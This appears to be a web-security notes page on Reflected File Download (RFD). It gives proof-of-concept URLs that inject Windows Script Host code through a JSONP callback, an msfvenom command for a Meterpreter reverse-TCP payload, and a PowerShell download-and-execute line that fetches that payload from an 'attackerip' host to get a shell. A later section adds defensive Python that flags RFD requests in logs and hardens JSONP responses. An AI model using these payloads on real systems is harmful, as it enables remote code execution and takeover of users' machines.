Reflected File Download (RFD)
POC
Here are some of the commands you can try to exploit this vulnerability:
https://www.vulnerable-website.com/api/some-path;/setup.bat;/setup.bat?callback=rfd\"||calc||
https://www.vulnerable-website.com/api/some-path;/setup.bat;/setup.bat?callback=WSH.Echo('Hello World');
https://www.vulnerable-website.com/api/some-path;/setup.bat;/setup.bat?callback=WSH.Echo('Hello World');var command = "Calc.exe";var WshShell = WScript.CreateObject("WScript.Shell");WshShell.Run(command);
Create the meterpreter payload:
msfvenom -p windows/x64/meterpreterreversetcp LHOST=attackerip LPORT=4444 -f psh -o meterpreter-payload.txt
https://www.vulnerable-website.com/api/some-path;/setup.bat;/setup.bat?callback=WSH.Echo('Hello World');var command = "powershell -ep bypass -NoExit -w hidden IEX (New-Object System.Net.Webclient).DownloadString('http://attackerip:8080/meterpreter-payload.txt')";var WshShell = WScript.CreateObject("WScript.Shell");WshShell.Run(command);
You’ll get a shell on the server
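As an added defender-side example (not part of the original PoC), the Python below flags the three ingredients of these requests in an access log (a ';' path parameter, an executable filename in the path, and a callback that is not a plain identifier) and builds a JSONP response hardened against RFD. The log-line format, the field names and the header set are assumptions of this example; the sample log lines are constructed from the first PoC URL above plus one benign request.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Filename extensions Windows runs directly when the downloaded file is opened.
EXECUTABLE_EXTENSIONS = (".bat", ".cmd", ".exe", ".ps1", ".vbs", ".js", ".hta")

# A JSONP callback must be a plain JavaScript identifier; anything else is
# reflected attacker input and must be rejected rather than echoed.
SAFE_CALLBACK = re.compile(r"^[A-Za-z_$][A-Za-z0-9_$]{0,63}$")


def classify_request(url: str) -> dict:
    """Flag the RFD ingredients present in one requested URL.

    1. a path parameter (';') that lets the attacker append a fake filename,
    2. a segment ending in an executable extension (the name the browser
       proposes in its Save dialog),
    3. a callback value that is not a plain identifier (the reflected payload).
    """
    parts = urlsplit(url)  # keeps ';' inside the path, unlike urlparse()
    findings = []
    if ";" in parts.path:
        findings.append("path parameter ';' present")
    for segment in re.split(r"[;/]", parts.path):
        if segment.lower().endswith(EXECUTABLE_EXTENSIONS):
            findings.append(f"executable filename in path: {segment}")
            break
    callback = parse_qs(parts.query, keep_blank_values=True).get("callback")
    if callback is not None and not SAFE_CALLBACK.match(callback[0]):
        findings.append("callback is not a plain identifier")
    return {"url": url, "suspicious": bool(findings), "findings": findings}


def scan_access_log(lines) -> list:
    """Return the suspicious requests from log lines shaped as
    '<client> <METHOD> <url> <status>' (an assumed, constructed format)."""
    flagged = []
    for line in lines:
        fields = line.split()
        if len(fields) < 3:
            continue
        result = classify_request(fields[2])
        if result["suspicious"]:
            flagged.append(result)
    return flagged


def safe_jsonp_response(callback: str, payload_json: str):
    """Build (status, headers, body) for a JSONP endpoint hardened against RFD.

    Framework-neutral shape (an assumption); the mitigations are the callback
    allow-list, a server-chosen download filename, and nosniff.
    """
    if not SAFE_CALLBACK.match(callback):
        return 400, {"Content-Type": "application/json"}, '{"error":"invalid callback"}'
    headers = {
        "Content-Type": "application/javascript; charset=utf-8",
        # A fixed, server-chosen name overrides any filename the browser would
        # otherwise infer from a ';/setup.bat' path parameter.
        "Content-Disposition": 'attachment; filename="api-response.json"',
        # Stop the browser from sniffing the body into another content type.
        "X-Content-Type-Options": "nosniff",
    }
    # Leading /**/ is a common JSONP hardening prefix: the response no longer
    # starts with bytes the caller controls.
    body = f"/**/{callback}({payload_json});"
    return 200, headers, body


# Constructed sample log lines: the page's first PoC request plus a benign JSONP call.
SAMPLE_LOG = [
    r'203.0.113.5 GET https://www.vulnerable-website.com/api/some-path;/setup.bat;/setup.bat?callback=rfd\"||calc|| 200',
    "198.51.100.7 GET https://www.vulnerable-website.com/api/some-path?callback=handleData 200",
]

if __name__ == "__main__":
    for hit in scan_access_log(SAMPLE_LOG):
        print(hit["url"])
        for finding in hit["findings"]:
            print("  -", finding)
    print(safe_jsonp_response("handleData", '{"ok":true}'))
    print(safe_jsonp_response('rfd"||calc||', '{"ok":true}'))
```

Running the block lists only the first log line, with all three findings, and shows the hardened response for a valid callback next to the 400 returned for the PoC's callback value. The detection side is deliberately narrow (it keys on the `callback` parameter name used on this page); on a real endpoint, apply the same identifier check to whichever parameter is reflected into the response body.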
Impact
Very High (when a shell session is obtained)
Likelihood
Very High (when a shell session is obtained)